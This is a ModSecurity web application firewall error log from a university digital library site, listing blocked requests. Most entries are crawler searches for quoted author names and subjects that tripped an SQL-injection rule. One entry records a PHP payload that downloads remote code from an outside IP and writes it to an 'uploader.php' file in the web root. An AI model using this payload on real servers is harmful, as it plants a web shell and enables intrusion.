[Mon Aug 28 09:13:32.100035 2023] [:error] [pid 39225] [client 47.128.30.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22L62\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwCzMCo-f0AAJk5i-kAAAAd"]
[Mon Aug 28 09:14:02.701835 2023] [:error] [pid 39171] [client 47.128.16.224] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Operations Research\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwC6sCo-f0AAJkDMfYAAAAD"]
[Mon Aug 28 09:23:41.415789 2023] [:error] [pid 39241] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fajar Djunaedi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwFLcCo-f0AAJlJPLYAAAAA"]
[Mon Aug 28 09:24:12.082908 2023] [:error] [pid 39322] [client 47.128.21.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Universal design\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwFTMCo-f0AAJmaBiAAAAAG"]
[Mon Aug 28 09:25:14.566431 2023] [:error] [pid 39304] [client 47.128.17.176] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Deon De Beer\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwFisCo-f0AAJmIkvMAAAAT"]
[Mon Aug 28 09:28:26.055021 2023] [:error] [pid 39433] [client 47.128.24.179] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22John Skvoretz\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwGSsCo-f0AAJoJVPwAAAAB"]
[Mon Aug 28 09:33:37.319520 2023] [:error] [pid 39514] [client 47.128.27.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22B. P. Iskandar\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwHgcCo-f0AAJpavioAAAAB"]
[Mon Aug 28 09:38:37.840660 2023] [:error] [pid 39570] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sashika Abeydeera\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwIrcCo-f0AAJqS01oAAAAP"]
[Mon Aug 28 09:44:39.793520 2023] [:error] [pid 39723] [client 47.128.20.160] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hana Savitri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwKF8Co-f0AAJsrZPQAAAAM"]
[Mon Aug 28 09:46:46.511345 2023] [:error] [pid 39782] [client 47.128.26.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Cluster initiative\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwKlsCo-f0AAJtmV3YAAAAc"]
[Mon Aug 28 09:48:39.767395 2023] [:error] [pid 39788] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Haar wavelets\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwLB8Co-f0AAJtsYO0AAAAA"]
[Mon Aug 28 09:51:35.669629 2023] [:error] [pid 39851] [client 47.128.29.224] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Daniel Hartono\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwLt8Co-f0AAJurnEAAAAAC"]
[Mon Aug 28 09:52:07.543997 2023] [:error] [pid 39797] [client 47.128.21.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Global reporting inititive\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwL18Co-f0AAJt1OFcAAAAK"]
[Mon Aug 28 10:00:10.986747 2023] [:error] [pid 39931] [client 66.249.70.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Jurnal Teknik Industri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwNusCo-f0AAJv7GfUAAAAY"]
[Mon Aug 28 10:01:24.725058 2023] [:error] [pid 39979] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Pellerin, David\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwOBMCo-f0AAJwrrZkAAAAD"]
[Mon Aug 28 10:05:51.333385 2023] [:error] [pid 39998] [client 47.128.31.184] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Tips n trix Computer Graphics Design!\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwPD8Co-f0AAJw@l3QAAAAD"]
[Mon Aug 28 10:08:38.666798 2023] [:error] [pid 40062] [client 47.128.24.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Hans Georg Gem\\xc3\\xbcnden\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwPtsCo-f0AAJx@1V8AAAAY"]
[Mon Aug 28 10:09:15.556982 2023] [:error] [pid 40042] [client 85.208.96.205] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Xinsheng Xu\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwP28Co-f0AAJxqMOkAAAAU"]
[Mon Aug 28 10:09:30.156735 2023] [:error] [pid 40060] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Value co-creation\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwP6sCo-f0AAJx8e1cAAAAW"]
[Mon Aug 28 10:10:27.522557 2023] [:error] [pid 40163] [client 34.72.81.166] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:vz. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '].'/ found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w '),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZOwQI8Co-f0AAJzjRHgAAAAP"]
[Mon Aug 28 10:14:08.109230 2023] [:error] [pid 40247] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Industry 4.0\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwRAMCo-f0AAJ03TNcAAAAJ"]
[Mon Aug 28 10:14:17.532889 2023] [:error] [pid 40168] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Andr\\xc3\\xa9 L.M. Vilela\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwRCcCo-f0AAJzozboAAAAb"]
[Mon Aug 28 10:18:42.540506 2023] [:error] [pid 40316] [client 47.128.23.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Small construction company\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwSEsCo-f0AAJ18TqMAAAAM"]
[Mon Aug 28 10:32:10.243133 2023] [:error] [pid 40551] [client 47.128.23.136] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Jones, Malcolm J\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwVOsCo-f0AAJ5nKr8AAAAE"]
[Mon Aug 28 10:32:19.235780 2023] [:error] [pid 40553] [client 47.128.28.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../images/docs/DAGP01.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/lib/minigalnano/createthumb.php"] [unique_id "ZOwVQ8Co-f0AAJ5poC0AAAAL"]
[Mon Aug 28 10:45:11.022345 2023] [:error] [pid 40588] [client 66.249.70.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Jurnal Teknik Industri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwYR8Co-f0AAJ6M7mEAAAAN"]
[Mon Aug 28 11:01:38.350172 2023] [:error] [pid 40963] [client 47.128.16.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Career development\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwcIsCo-f0AAKADJQ0AAAAQ"]
[Mon Aug 28 11:17:14.953469 2023] [:error] [pid 41142] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22SISSON, Roger\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOwfysCo-f0AAKC21dQAAAAH"]
